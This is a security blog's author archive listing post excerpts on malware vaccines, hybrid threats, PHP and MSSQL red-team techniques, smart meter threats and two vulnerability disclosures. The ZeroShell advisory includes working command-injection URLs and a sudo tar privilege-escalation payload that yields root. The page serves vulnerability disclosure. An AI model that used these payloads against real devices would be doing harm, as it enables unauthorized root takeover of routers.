About Administrador

This author has not yet filled in any details.
So far Administrador has created 238 blog entries.

Ragnarok Stopper: development of a vaccine

By |4 May. 2020|BlackArrow blog|

The field of reverse engineering and specifically malware analysis within the Incident Response process is of vital importance. Beyond the analysis of logs, events, network connections, alerts generated by IDS and firewalls, etc., experience tells us that a preliminary and quick analysis of a suspicious binary (whenever possible) can offer high-value intelligence, not just to get more context about an incident (TTP, C2, persistence, timeline, etc.) but to develop tools or techniques to mitigate a campaign still underway. The following case is an example of this. In a recent incident we obtained a binary packaged with Ragnarok, a malware widely used in the last months in various campaigns. The aim of this post is to describe a possible vaccine that ...

Read More
Comments Off on Ragnarok Stopper: development of a vaccine

Hybrid Threats against Companies

By |14 Apr. 2020|Cyber intelligence blog|

Hybrid threats are not new to the corporate sector Expressions such as hybrid war and hybrid threat have given name to phenomena of increasing prominence so far this century. At the same time, the definition of notions behind those terms has been progressively narrowed. There is also a growing effort to better understand and study this concern. Term and concept correlation was originally developed in the military and geopolitical domains, as a result of new ways of understanding war, changes and developments in national strategies and confrontation between countries. The term hybrid refers to a state of non-direct, latent conflict which does not openly and officially escalate beyond certain limits, and where casualties and/or direct damages are not agreed upon ...

Read More
Comments Off on Hybrid Threats against Companies

A deep dive into disable_functions bypass and PHP exploitation

By |26 Mar. 2020|BlackArrow blog|

When performing a penetration test, or a Red Team operation, multiple tools (webshells, proxysocks to tunnel TCP traffic on HTTP and pivot, etc.) tend to be deployed on compromised web servers as custom scripts. In some cases these servers may be more or less bastioned, making somewhat difficult to compromise them. One of the most common configurations that can be found in PHP environments is the use of disable_functions to restrict what functions can be used in PHP scripts, to avoid using "dangerous" ones such as system(), passthru(), etc. In this article we will take an in-depth look at how this PHP directive works and how to circumvent it. In summary, this article aims to shed light on the following ...

Read More
Comments Off on A deep dive into disable_functions bypass and PHP exploitation

Lateral movement via MSSQL: a tale of CLR and socket reuse

By |24 Mar. 2020|BlackArrow blog|

Recently, our Red Teamers had to deal with a restricted scenario, where all traffic from the DMZ to the main network was blocked, except for connections to specific services like databases and some web applications. In this article, we will explain how we overcame the situation, covering the technical details. We also introduce mssqlproxy, a tool for turning a Microsoft SQL Server into a socks proxy. Introduction and context At some point, sysadmin access to a Microsoft SQL Server within the main network is gained, but only traffic to the 1433 port is allowed. After trying to launch a reverse shell via xp_cmdshell, the team realizes that connections back to the DMZ were also blocked. Restricted environment In order to ...

Read More
Comments Off on Lateral movement via MSSQL: a tale of CLR and socket reuse

Tabletop – Simulation Exercise

By |28 Nov. 2019|Cyber intelligence blog|

For decades, airlines and air forces have used simulators as an essential tool to strengthen navigational safety and to improve the preparation and level of training of their crews. Using the simulator, crews become familiar with the rules and procedures of navigation and air traffic and improve their ability to respond to alerts and emergencies in conditions of "virtual stress". This is because in simulated environments you can repeat situations in order to improve your responses to the exercises and scenarios that appear. In spite of its increasing technological complexity, the air simulator is ultimately a cost-effective tool if one takes into account the savings made in terms of fuel, aircraft maintenance and navigation systems, amongst other benefits (reducing pollution, ...

Read More
Comments Off on Tabletop – Simulation Exercise

France and economic intelligence

By |6 Nov. 2019|Cyber intelligence blog|

Summary France is a pertinent example of a country where the State supports large national companies through its intelligence services. It further distinguishes itself with the transfer of knowledge from the intelligence community to the private sphere through the creation of organizations and training programs that have been enhanced by the experience of former members of the intelligence services. This process has allowed for the creation of a unique and original way of thinking when it comes to economic intelligence. However, the French intelligence services have prioritized counterterrorism, which has come with a reduction in the resources allocated to intelligence work in the economic sphere, in addition to the need to take on the new responsibilities arising from the spike ...

Read More
Comments Off on France and economic intelligence

Smart Meters – Threats and Attacks to PRIME Meters

By |4 Nov. 2019|Tarlogic's Blog - Cybersecurity|

A golden rule in the world of cybersecurity is that the system risk is greater than the aggregate risk of its component elements. This is because, as the number of vulnerable elements grows, the more sophisticated (and difficult to trace) the attacks against the system become. The first necessary step to identify the risk of an element is to study the threats to which it is subjected and, subsequently, to study what makes it vulnerable to them. Thus, in an infrastructure of intelligent meters, the most pertinent threats are the following: Threats to meters Threats to the network hub Threats to the remote management network Threats to the distributor's servers Threats to links This article will list the threats to ...

Read More
Comments Off on Smart Meters – Threats and Attacks to PRIME Meters

ZeroShell Vulnerability – CVE-2019-12725

By |17 Jul. 2019|Tarlogic's Blog - Cybersecurity|

Product: ZeroShell Publication Date: 17/07/2019 Author: Juan Manuel Fernandez (@TheXC3LL) - Tarlogic Zeroshell vulnerability - CVE-2019-12725 RCE as root The latest version of ZeroShell linux router (3.9.0) is vulnerable to RCE because some parameters inside a script are used without a properly sanitization. This issue can be abused via new-line characters: Example of vulnerable parameter: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A' Additionally the Apache user can execute the "tar" command as root (/etc/sudoers): (...) apache ALL= NOPASSWD: /bin/tar (...) Zeroshell exploit This ZeroShell vulnerability can be abused in order to elevate privileges via the RCE: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A' uid=0(root) gid=0(root) groups=0(root) A security update will be released in the next days Discover our work and cybersecurity services.

Read More
Comments Off on ZeroShell Vulnerability – CVE-2019-12725

Ubiquoss Switch VP5208A Vulnerability – CVE-2018-10024

By |1 Sep. 2018|Tarlogic's Blog - Cybersecurity|

Vendor: Ubiquoss Product: Ubiquoss Switch VP5208A Discovered by: Juan Manuel Fernandez - Tarlogic (@TheXC3LL) Ubiquoss Switch VP5208A Vulnerability - CVE-2018-10024 Credential disclosure ---------------------- Ubiquoss Switch VP5208A creates a bcm_password file at /cgi-bin/ with the user credentials in clear-text when a failed login attempt is done. The file can be reached via browser. Credentials can be used access the system via SSH (or telnet if it is enabled). Time Line ---------------------- 18/09/17 - First attempt to contact vendor. 06/03/18 - Contacted US-CERT with the report. 15/03/18 - ACK from US-CERT. They gave us other e-mail address to try to contact. 15/03/18 - Attempt to contact vendor at the new e-mail address. 09/04/18 - Disclosure Discover our work and cybersecurity services.

Read More
Comments Off on Ubiquoss Switch VP5208A Vulnerability – CVE-2018-10024

We are using cookies to give you the best experience on our website. You can find out more about which cookies we are using or switch them off in Cookies Settings

Privacy policy - Legal notice

Necessary

Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

3rd Party Cookies

This website uses Google Analytics to collect anonymous information such as the number of visitors to the site, and the most popular pages. Keeping this cookie enabled helps us to improve our website.

Cookies policy